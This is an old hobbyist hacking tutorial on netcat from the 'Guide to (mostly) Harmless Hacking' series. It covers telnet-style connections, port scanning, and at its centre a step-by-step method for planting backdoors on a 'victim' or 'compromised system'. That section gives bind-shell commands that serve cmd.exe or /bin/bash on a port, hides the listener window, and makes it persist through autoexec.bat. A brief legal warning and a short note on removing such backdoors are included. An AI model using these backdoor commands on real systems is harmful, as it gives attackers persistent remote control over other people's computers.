GUIDE to (mostly) Harmless Hacking:HOW TO USE NETCAT
By Steven (Dist0rted) Welch ith help from
Click here for a fun addition to this guide!--->
If you haven't ever used netcat before, you're missing out on one of the greatest programs I've ever used for hacking. So just what is it? It's basically a buffed up version of telnet that has many options that allow it to do many things - at which I'll try to cover in this article. Even better, it runs on Windows and Unix! Where can you get it? It was developed by the l0pht, which is now @stake ( so you can get it there. There are also countless other sites out there that have netcat for download.
But before you read this guide, you should probably already know how to use telnet and write batch files, both of which can be located on the main GTMHH page. (Speaking of which, it's just best to read all of the GTMHH first.)
So, first off lets show netcat as a telnet client. Heres how netcat works:
NOTE: From here on I'm assuming that Windows is installed onto drive C:. If it's something else like Z: then just change accordingly.
Obviously you're going to first download and install netcat. For Windows, get the right version and unzip it to whatever directory you like. Just make sure that you copy the nc.exe file to the C:\WINDOWS\System32 or C:\WINNT\System32 directory when on Windows NT/2000/XP. For 95/98/ME, copy it to C:\WINDOWS.
On UNIX, you'll need to get the appropriate version, unpack it, and then view the readme for install instructions.
Open up the command prompt for your system. For Windows, this will mean Start -> Programs -> Accessories -> MS-DOS Prompt or Start -> Programs -> MS-DOS Prompt or Start -> All Programs -> Accessories -> Command Prompt. For UNIX, you should already know how to get to it.
Now type the following command and hit the ENTER key:
nc <target> <port>
Here's how this will work:
nc - runs netcat
<target> - what IP or hostname to connect to
<port> - port to connect to on the IP or hostname
Heres an example:
nc 10.0.0.1 23
That would connect to 10.0.0.1 on port number 23.
It's just like using telnet but has many more features that I'll now cover.
Next, I'll discuss one of my favorite parts of the program: it allows you to set up backdoor ports on a compromised system. This is way easier than programming backdoors using sockets, and easier than editing inetd.conf entries. So how do you do it? Let's cover Windows NT/2000/XP first.
Get a copy of the nc.exe file onto the target C:\WINDOWS\System32\ directory and run the command "nc -L -d -p 2003 -t -e cmd.exe" (without the quotes). What did this do? It set up a backdoor that would open up a MS-DOS shell when connected to at port 2003. (So if you were to telnet to the victem's computer on port 2003, you would get a command prompt from which you have total control over the system.)
You can go to jail warning: Before you folks start emailing Steven Welch, pavethetrees or Carolyn Meinel asking "But HOW do I get the nc.exe file onto the victim computer?" take a deep breath. If you own the "victim" computer, fine, just install it! If it belongs to your boyfriend/girlfriend/friend/enemy/teacher, then you have to get permission to install it. If you don't have permission, you can go to jail! This Guide is so you can have fun using netcat LEGALLY, comprende?
How did it work? Here:
nc - ran netcat
-L - tells netcat to stay open and listen (set up a backdoor)
-d - tells netcat to detach (don't open up a window on the victem's computer when listening)
-p 2003 - tells netcat when listening to listen to port 2003 (you could change 2003 to whatever other port you choose)
-t - tells netcat to accept telnet connections
-e cmd.exe - tells netcat to open up cmd.exe (the MS-DOS shell) when connected to
How about Windows 95/98/ME? Do the exact same thing as you did with NT/2000/XP, exept just put the nc.exe file onto the C:\WINDOWS\ directory, and when you run the command, change the end to "-e command.com" instead of "-e cmd.exe" so that you'll run the 95/98/ME MS-DOS shell.
In case you haven't noticed, if the target reboots the computer then the backdoor won't be running anymore. How can we fix this? Open up the file C:\autoexec.bat in a text editor by typing the command "edit \autoexec.bat" in your backdoor and add to the end of the file the command that you want to run when the computer starts ("nc -L -d -p 2003 -t -e cmd.exe" or whatever it is). Then save and exit.
Alright, we've got the backdoor working on Windows, but what about Unix? Install netcat on the target system (even though most systems come pre-installed with it). Then run the command "nc -nvv -l -p 2003 -e /bin/bash". If you ran the backdoor on Windows, then you should pretty well know how this works, but anyway:
nc - runs the netcat program
-nvv - the n part says to not do a host lookup (kinda advanced but kinda not...) and the vv says to do double verbose (output as much information as possible) while a single v says to do just a normal verbose (just output a little more information)
-l - tells netcat to stay open and listen
-p 2003 - tells netcat when listening to listen to port 2003 (you could change 2003 to whatever other port you choose)
-e /bin/bash - tells netcat to open up /bin/bash (one of the many Unix shells) when connected to (you could also choose /bin/sh, /bin/tcsh, etc. if you wish)
You may say, "When I run the command it just says command not recognized!" This is most likely because the directory you installed netcat to is not in the system path. You have three options: install netcat to a directory like /usr/local which is in the system path, set the system path to also include the directory that you installed netcat to, or just "cd" to the directory that you installed netcat to and include a "./" in front of the netcat command ("./nc -nvv -l -p 2003 -e /bin/bash").
Also, on some Unix systems the rpm version of netcat won't let you use the "-e" option - so you can't use backdoors with that. What you need to do is install the .tar.gz or .tgz version of netcat that will allow you to use "-e".
So now that you're having fun and impressing your friends with this new netcat backdoor, you get fustrated when you find out that you've been cracked and you think that the netcat backdoor is running on your system! "How do I get rid of this thing!?" Well, first I'd check C:\autoexec.bat for a netcat entry (or /etc/inetd.conf for Unix). If you find one, delete it and find the program that's running the backdoor. This can be done by simply searching for "nc" or "nc.exe" but most likely the attacker will have changed the filename to something else. In Windows you can CTRL + ALT + DEL and find a suspicious looking process to terminate. Or with Unix you can use the "ps" command to find a program that's running a netcat backdoor. Beyond that just use common sense for techniques that will eliminate the backdoor.
Now that I've gotten done with the backdoor side of netcat, let's discuss port scanning with netcat. Netcat doesnt have any stealth options, but it does a definite connect and after a specific timeout it will disconnect and go to the next port. Heres how it works:
nc -z -w2 0.0.0.0 1-6000
nc - runs netcat
-z - tells netcat to run a portscan
-w2 - tells netcat the time after which to disconnect - here its 2 seconds
0.0.0.0 - the target IP address - this is where you put the target IP or hostname
1-6000 - tells netcat the range of ports to scan - here it was port 1 to 6000
If you want, you can add the option -v or -vv to see more of whats going on in netcat.
Heres an example of a portscan:
nc -vv -z -w2 10.0.0.1 1-6000
Basically, the port scanning is very simple to understand. So, theres no big long explenation or anything.
Well, this ends my guide to netcat. I hope you learned everything here. Go ahead and play around with netcat - it's my favorite tool that I've ever used (besides of course those lovely network sniffers...). If you ever need help, feel free to e-mail me.
Search the GTMHH
Why do we freely give out information that even the total beginner may use as a two-edged sword of cyberspace power? We do this "to turn over to mankind at large the greatest possible power to control the world and deal with it according to its lights and values." -- Robert J. Oppenheimer, head of the Manhattan Project, which created the world's first nuclear weapons.